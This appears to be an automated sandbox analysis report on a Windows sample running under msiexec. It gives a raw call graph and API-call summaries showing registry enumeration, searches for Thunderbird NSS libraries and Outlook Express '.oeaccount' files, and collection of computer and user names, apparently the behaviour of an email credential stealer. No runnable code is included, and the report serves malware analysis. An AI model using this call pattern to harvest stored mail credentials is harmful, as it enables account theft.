33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                    Executed Functions

                                                                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040832F
                                                                    • memset.MSVCRT ref: 00408343
                                                                    • memset.MSVCRT ref: 0040835F
                                                                    • memset.MSVCRT ref: 00408376
                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                    • strlen.MSVCRT ref: 004083E9
                                                                    • strlen.MSVCRT ref: 004083F8
                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                    • String ID: 5$H$O$b$i$}$}
                                                                    • API String ID: 1832431107-3760989150
                                                                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                    APIs
                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                    • strlen.MSVCRT ref: 00407F64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindstrlen$FirstNext
                                                                    • String ID: ACD
                                                                    • API String ID: 379999529-620537770
                                                                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                    Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 00401E8B
                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                    • strlen.MSVCRT ref: 00401F06
                                                                    • memset.MSVCRT ref: 00401FB1
                                                                    • atoi.MSVCRT(?), ref: 00401FE0
                                                                    • memset.MSVCRT ref: 00402003
                                                                    • sprintf.MSVCRT ref: 00402030
                                                                    • memset.MSVCRT ref: 00402086
                                                                    • memset.MSVCRT ref: 0040209B
                                                                    • strlen.MSVCRT ref: 004020A1
                                                                    • strlen.MSVCRT ref: 004020AF
                                                                    • strlen.MSVCRT ref: 004020E2
                                                                    • strlen.MSVCRT ref: 004020F0
                                                                    • memset.MSVCRT ref: 00402018
                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
